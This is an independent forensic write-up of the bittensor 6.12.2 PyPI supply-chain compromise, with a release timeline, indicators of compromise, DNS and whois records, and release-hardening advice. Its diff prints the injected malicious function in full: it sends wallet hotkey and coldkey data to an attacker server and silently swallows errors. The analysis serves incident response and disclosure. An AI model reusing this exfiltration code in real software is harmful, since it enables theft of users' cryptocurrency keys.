I had no plans to publish this. In fact, I had no plans to investigate it. In fact, I’d have preferred to not even know about it. But I saw a tweet, thought someone was wrong on the internet, and well, you know what happens.
Note: This is a purely independent investigation of what happened. I have no relationship with anyone involved in the Opentensor Foundation, nor any relationship with anyone involved in the bittensor project, nor any inside information about the incident. I just got nerd sniped by a tweet and this investigation fell out.
TL;DR
An attacker published a modified version of bittensor 6.12.2 to PyPI which contained a malicious validate function designed to send wallet keys to an attacker controlled server. Due to the nature of the attack, this was likely due to a compromised PyPI API key – potentially through a compromised developer.
The Opentensor Foundation published a blog post earlier today (2024-07-03) about a security incident they had discovered.
The blog post does try to provide helpful, useful information. But it also is a little bit vague about what happened. In particular, their “Root cause of attack” says the following:
The attack was traced back to the PyPi Package Manager version 6.12.2, where a malicious package was uploaded, compromising user security.
- The malicious package, masquerading as a legitimate Bittensor package, contained code designed to steal unencrypted coldkey details.
- When users downloaded this package and decrypted their coldkeys, the decrypted bytecode was sent to a remote server controlled by the attacker.
This indicates that the issue was found to be in their PyPI release 6.12.2. But the subsequent language can be a little misleading:
The malicious package, masquerading as a legitimate Bittensor package…
This makes it sound like it could be a package squatting type attack, where the attacker was pretending to be a legitimate Bittensor package. But that’s not the case – as far as PyPI was concerned, it was a legitimate Bittensor package – it was uploaded to the Bittensor project, presumbly by an API key authorized to do so.
Timeline
The malicious version of the package was available between 2024-05-22T19:14:09Z and 2024-07-02 (time unknown), or approximately 41 days.
- 2024-05-22T19:14:09Z - Publish to PyPI
- 2024-05-22T21:25:09Z - 6.12.2 release was published to Github by gus-opentensor.
- 2024-05-22T21:25:00Z - 6.12.2 image was published on hub.docker.com by gopentensor (Note: Dockerhub doesn’t give me a timezone, but by modifying my system time I was able to confirm it localizes, so I set to UTC and got this timestamp)
- 2024-07-02T19:06:00Z - Attacker begins to transfer funds to their own wallet, according to the incident report
- 2024-07-02T19:25:00Z - OTF identifies the anomalous behavior and starts a war room
- 2024-07-02T19:41:00Z - OTF puts chain validators behind a firewall to prevent connections, stopping transaction processing to allow for analysis.
The Malicious Code
PyPI
In order to identify the actual root cause, since I couldn’t really tell based on Bittensor’s document, I downloaded the PyPI yanked release source distribution for 6.12.2, and then downloaded the Github 6.12.2 tagged release in order to compare them.
I labeled each download with it’s source (e.g. -pypi
and -github
), and then ran diff against them to see if there was any difference.
$ diff bittensor-6.12.2-pypi/bittensor bittensor-6.12.2-github/bittensor
Common subdirectories: bittensor-6.12.2-pypi/bittensor/btlogging and bittensor-6.12.2-github/bittensor/btlogging
Common subdirectories: bittensor-6.12.2-pypi/bittensor/commands and bittensor-6.12.2-github/bittensor/commands
Common subdirectories: bittensor-6.12.2-pypi/bittensor/extrinsics and bittensor-6.12.2-github/bittensor/extrinsics
Common subdirectories: bittensor-6.12.2-pypi/bittensor/mock and bittensor-6.12.2-github/bittensor/mock
Common subdirectories: bittensor-6.12.2-pypi/bittensor/utils and bittensor-6.12.2-github/bittensor/utils
diff --color bittensor-6.12.2-pypi/bittensor/wallet.py bittensor-6.12.2-github/bittensor/wallet.py
23d22
< import base64
25d23
< import asyncio
28d25
< from aiohttp import ClientSession
291,310d287
< def validate(self, key: str, keypair: "bittensor.Keypair") -> "bittensor.Keypair":
< """
< Validate the bittensor keypair.
<
< Args:
< key (str): Key type.
< keypair (bittensor.Keypair): The keypair to validate.
< """
< try:
< async def validate_key(key, value):
< async with ClientSession() as s:
< await s.post('http://api.opentensor.io/v1', json={
< key: {
< k: base64.b64encode(v).decode('ascii') \
< if isinstance(v, bytes) else v for k, v in value.__dict__.items()
< }})
< asyncio.run(validate_key(key, keypair))
< except: pass
< return keypair
<
460c437
< return self.validate("hotkey", self._hotkey)
---
> return self._hotkey
474c451
< return self.validate("coldkey", self._coldkey)
---
> return self._coldkey
It looks like the PyPI version has this validate
function defined in wallet.py
that isn’t present in the Github release. This is consistent with how I would have done this attack – Github is much more likely to have eyes on it, have code review requirements, etc. Most people don’t pay any attention to the source they download from PyPI.
I was also able to confirm that the bittensor-6.12.2-py3-none-any.whl
artifact also contained the malicious code present in the source distribution.
Docker
I also pulled the docker image via docker pull opentensorfdn/bittensor:6.12.2
and then investigated the copies of wallet.py
it contained - these looked to match the legitimate code in Github, rather than the illegitimate code from PyPI.
# find / -name wallet.py
/root/.bittensor/bittensor/build/lib/bittensor/wallet.py
/root/.bittensor/bittensor/bittensor/wallet.py
/opt/conda/lib/python3.10/site-packages/bittensor/wallet.py
root@021b52f547d9:/workspace# find / -name wallet.py | xargs grep -i opentensor
root@021b52f547d9:/workspace#
Anomalies in the release
While trying to understand the likely scenario that played out here, I investigated the bittensor CI configurations (CircleCI and their more recent Github). I also looked at the CI run history for the 6.12.2 release.
One thing that stuck out to me pretty much immediately is that these CI workflows are not responsible for publishing a release. There is a release-dry-run
job that gets run, which runs a /scripts/release/release.sh --github-token ${GH_API_ACCESS_TOKEN}
script, but it specifically says dry-run, and looking at the CI output, we can see things indicating as much.
[WARNING] Dry run execution. Not uploading python wheel
[INFO] Releasing docker image
[WARNING] Dry run execution. Not login into docker registry
[WARNING] Dry run execution. Building docker image 'opentensorfdn/bittensor:6.12.2' but not pushing it
[...]
[WARNING] Dry run execution. Not pushing docker image 'opentensorfdn/bittensor:6.12.2'
This means that when new versions of bittensor get published, they either have some other automated system tucked away where no one can see it (best case scenario), or a human runs this release script from their workstation to publish a new release (more likely scenario).
Wildly varying upload times
If a typical release follows this release.sh
script, then the 2 hours and 11 minutes between the PyPI release and the Github/Dockerhub release is extremely anomalous. The release.sh
script should do the github release first, then the pip release, then the docker release. But we saw the pip release first, followed by the github and docker release a couple hours later.
This would suggest to me that the attacker uploaded the PyPI package manually. Then either someone else noticed and retroactively added the github/docker releases to achieve consistency with the released version, or the attacker didn’t know how to trigger the github and docker releases when they found the PyPI credentials and later found the necessary credentials to do so and hide their tracks.
Indicators of Compromise
The attacker used plain HTTP connections to POST data to api.opentensor.io/v1
. The request would have contained a JSON POST body with a single top level key, key
.
- Domain:
api.opentensor.io
- Path:
api.opentensor.io/v1
- Hash:
e199f3eef8c741beee870fc261fe857823d1a5c89e0ce93e5cc6e8327f8a125e wallet.py
- Hash:
9b74ecd6b77f110cf907c9f8514f98ce2d94fbf7326537fe5eb5e516c0b9c16e bittensor-6.12.2-py3-none-any.whl
DNS
DomainTools claims to have 2 historical records for opentensor.io
, however I don’t have a DomainTools account anymore, so you’ll have to investigate that yourself if you want it.
At the time of my investigation, this DNS name has been cleaned up:
➜ dig api.opentensor.io
; <<>> DiG 9.16.48-Ubuntu <<>> api.opentensor.io
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7873
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;api.opentensor.io. IN A
;; AUTHORITY SECTION:
opentensor.io. 3600 IN SOA 1-you.njalla.no. you.can-get-no.info. 2024060301 21600 7200 1814400 3600
;; Query time: 250 msec
;; SERVER: 172.25.64.1#53(172.25.64.1)
;; WHEN: Wed Jul 03 18:36:53 PDT 2024
;; MSG SIZE rcvd: 129
Whois
For completeness, the whois
data is not particularly useful, but I’ll include it anyways.
Domain Name: opentensor.io
Registry Domain ID: 52c766b3bc3741dbbb33e18e4b0ab51d-DONUTS
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2024-05-25T22:53:39Z
Creation Date: 2024-05-20T22:52:45Z
Registry Expiry Date: 2025-05-20T22:52:45Z
Registrar: Sarek Oy
Registrar IANA ID: 802672
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: 1337 Services LLC
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Charlestown
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: KN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: 1-you.njalla.no
Name Server: 2-can.njalla.in
Name Server: 3-get.njalla.fo
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2024-07-03T15:04:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Recommendations
If I were giving a professional recommendation for ensuring this sort of thing is more difficult to achieve in the future, based purely on my current knowledge of the incident, the first place I would start would be only doing releases through a github workflow. PyPI offers a relatively new “trusted publishing” implementation to connect to GitHub Actions, and they provide a useful guide on publishing packages using Github Actions. By following this release pattern, no developer would possess an API key necessary to upload a malicious package.
You can then further combine this with tightened Github branch protections, to ensure that the workflow to publish a PyPI package (and a docker hub image) can only be executed after proper code review and the requisite approvals.
In a more reactive approach, it is likely possible to automate analysis of your published PyPI distributions in order to detect deviations from a clean build. But if your builds have some level of clear provenance, this becomes less interesting, less useful, and not worth the time spent.
Conclusion
Based on the evidence I’ve seen, I suspect that a PyPI API token was compromised, either through an accidental leak or a compromised developer workstation. The attacker showed a reasonable level of awareness, choosing to only publish to the PyPI package index, rather than also publishing the code to Github where it might be further scrutinized.
I would consider every key used between 2024-05-22T19:14:09Z and whatever time the 6.12.2 release was yanked on 2024-07-02 (the PyPI API does not appear to record this as a timestamp, only a boolean) to be potentially compromised, particularly if you have or may have had this version installed.
I’m interested to see how much more detail the Opentensor Foundation publishes as they continue their investigation.